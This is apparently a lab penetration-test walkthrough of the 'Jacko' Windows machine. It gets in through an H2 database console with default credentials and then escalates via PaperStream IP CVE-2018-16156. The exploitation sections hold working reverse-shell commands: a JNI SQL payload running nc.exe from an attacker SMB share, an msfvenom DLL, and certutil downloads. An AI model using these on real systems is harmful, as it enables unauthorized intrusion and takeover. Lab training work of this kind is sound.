PG Practice - Jacko Walkthrough

Dec 26, 2023 · 7 mins read
OSCP Offsec Penetration Testing Windows
PG Practice - Jacko Walkthrough

Introduction

This report provides a comprehensive analysis of a penetration test performed on ‘Jacko,’ a designated Windows machine classified as intermediate difficulty from Offensive Security’s PG Practice Labs. The objective of this test was to identify and exploit vulnerabilities within Jacko, with a focus on understanding the security posture of the system and recommending measures for mitigation and improvement. The scope of this test encompassed various stages of penetration testing, including information gathering, vulnerability assessment, exploitation, and post-exploitation analysis.

The key phases in the methodology included: Information Gathering, which involved acquiring initial information about the target; Service Enumeration, focused on identifying open ports and active services; Vulnerability Identification, aimed at discovering potential vulnerabilities; Initial Access, entailing the exploitation of identified vulnerabilities to gain entry into the system; Post-Compromise Enumeration, which involved acquiring more detailed information after gaining access; and finally, Privilege Escalation, aimed at raising access rights to gain further control.

Reconnaissance

The penetration test commenced with an nmap scan, revealing several open ports. Notably, ports 80 and 8082 were identified as significant: port 80 was hosting a Microsoft IIS server, and port 8082 was serving an H2 Database Engine.

nmap -sCV -p- -T4 -v 192.168.155.66 -oA jacko

Nmap scan report for 192.168.155.66
Host is up (0.057s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: H2 Database Engine (redirect)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
7680/tcp open  pando-pub?
8082/tcp open  http          H2 database http console
|_http-favicon: Unknown favicon MD5: D2FBC2E4FB758DC8672CDEFB4D924540
|_http-title: H2 Console
| http-methods: 
|_  Supported Methods: GET POST
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-12-05T00:30:20
|_  start_date: N/A
|_clock-skew: -1s

Port 80

During the assessment, the H2 Database Engine interface was accessed via port 80. Although the version of the engine was not immediately discernible, the Quickstart guide revealed a web console on port 8082. Notably, default administrative credentials were found exposed on the Quickstart page, presenting a potential pathway for initial access.

diagram

diagram

Initial Access

Access to the H2 database web console on port 8082 was achieved using the default credentials. Subsequent investigation revealed that the H2 database was running version 1.4.199. This particular version is known to be vulnerable to a JNI code execution exploit. The vulnerability and its exploitation were detailed by Markus Wulftange and have been documented in a comprehensive blog post.

diagram

The critical aspect of this vulnerability lies in its ability to permit the execution of arbitrary Java code on the server, bypassing the need for a Java Compiler. This is achieved by leveraging the Java Native Interface (JNI), which allows for a Java class to be directly loaded into memory. Consequently, this exploit circumvents the typical requirement of having a Java Compiler present on the machine running the H2 database, thus posing a critical security risk.

Exploitation

In the initial phase of exploitation, preparation of the local environment was necessary to intercept the reverse shell. The Impacket’s smbserver.py script was utilized to set up an SMB server. The rationale for this approach was that the SMB server would host the Netcat executable (nc.exe). This executable would then be called by the exploit on the target system.

impacket-smbserver -smb2support tmp /home/kali/pg/jacko

Simultaneously, a Netcat listener was established to capture the reverse connection:

nc -nvlp 8082

diagram

With the environment appropriately configured, the next step involved executing the SQL statements.

-- Evaluate script 
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c //192.168.45.154/share/nc.exe -e cmd.exe 192.168.45.154 8082").getInputStream()).useDelimiter("\Z").next()');

The Evaluate script command leveraged the Windows command line to execute nc.exe from the SMB share set up earlier, thereby creating a reverse shell to the listener.

diagram

When the target system executed these SQL commands, the nc.exe on the target initiated a connection back to the listener on port 8082. This action resulted in the reception of the shell on the attacking machine, effectively granting access to the target system.

diagram

Privilege Escalation

Upon establishing a foothold within the target system, the next objective was to escalate privileges to gain more comprehensive control over the system. Enumeration efforts led to the discovery of a directory named PAPERSTREAM IP within Program Files (x86). Further investigation of this directory revealed a potential vulnerability associated with the PaperStream IP (TWAIN) software.

diagram

Identifying the Vulnerability

The specific vulnerability was linked to CVE-2018-16156, a security flaw in PaperStream IP (TWAIN) 1.42.0.5685 (Service Update 7). This vulnerability revolves around the FJTWSVIC service, which runs with SYSTEM privileges and processes unauthenticated messages over the FjtwMkic_Fjicube_32 named pipe. A critical function within this service attempts to load the UninOldIS.dll library dynamically and executes its ChangeUninstallString function. Importantly, the default installation does not include this library, meaning if a DLL with that name is placed in a PATH directory, it could be executed with SYSTEM privileges.

Addressing Environment Variable Issues

During the assessment, difficulties were encountered executing basic system commands like whoami due to a misconfigured PATH environment variable on the target machine. The PATH variable is essential as it directs the operating system to executable files. If key system directories are missing from PATH, common commands and executables become inaccessible.

diagram

To address this, the PATH variable was reset using the following command:

set PATH=%SystemRoot%\system32;%SystemRoot%;

diagram

Crafting and Deploying the Exploit

Throughout the course of the assessment, an existing exploit, identified as Exploit-DB (ID: 49382), was identified. To effectively utilize this exploit, a custom DLL payload was first generated using msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.45.154 LPORT=8082

Preparing for Payload Deployment

It was verified that the user (jacko\tony) had write permissions to the desktop directory, a important factor for placing the payload.

C:\Windows\System32\icacls.exe C:\users\tony\Desktop\

diagram

With this confirmation, it was necessary to modify the exploit to point to the payload generated by msfvenom.

diagram

Setting Up for the Exploit Execution

In order to execute the exploit, a Python HTTP server was started on the attacker machine. This server hosted both the exploit and the payload.

python3 -m http.server 80

diagram

Subsequently, certutil was used to download the exploit script and the payload onto the target machine.

certutil -urlcache -split -f http://192.168.45.154/49382.ps1
certutil -urlcache -split -f http://192.168.45.154/UninOldIS.dll

diagram

Gaining SYSTEM Privileges

Finally, a Netcat listener was set up on port 8082 to capture the reverse connection initiated by the exploit.

nc -nvlp 8082

Running the exploit:

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\users\tony\Desktop\49382.ps1

diagram

Recommendations

Jacko H2 Database Vulnerability

Change Default Credentials: It was observed that the H2 Database could be accessed using default credentials. It is strongly recommended to change these credentials to robust, unique passwords. A strong password should ideally be at least 16 characters long, comprising a mix of alphanumeric and special characters.

Enable Multi-Factor Authentication (MFA): If feasible, implement multi-factor authentication. MFA adds an additional layer of security, making unauthorized access significantly more challenging.

Restrict Access: Limit access to the H2 Database engine strictly to personnel who require it for their work. Implementing access controls will reduce the risk of unauthorized access and potential internal misuse.

Paper StreamIP

Review and Enhance Patch Management Policies: It is crucial to establish a robust patch management process not only for PaperStream but for all software used within the environment. This process should ensure that all software, including PaperStream, is regularly updated to the latest versions. Timely application of patches is key in protecting against known vulnerabilities. Regular reviews of these policies will help maintain an effective defense against emerging threats.

Sharing is caring!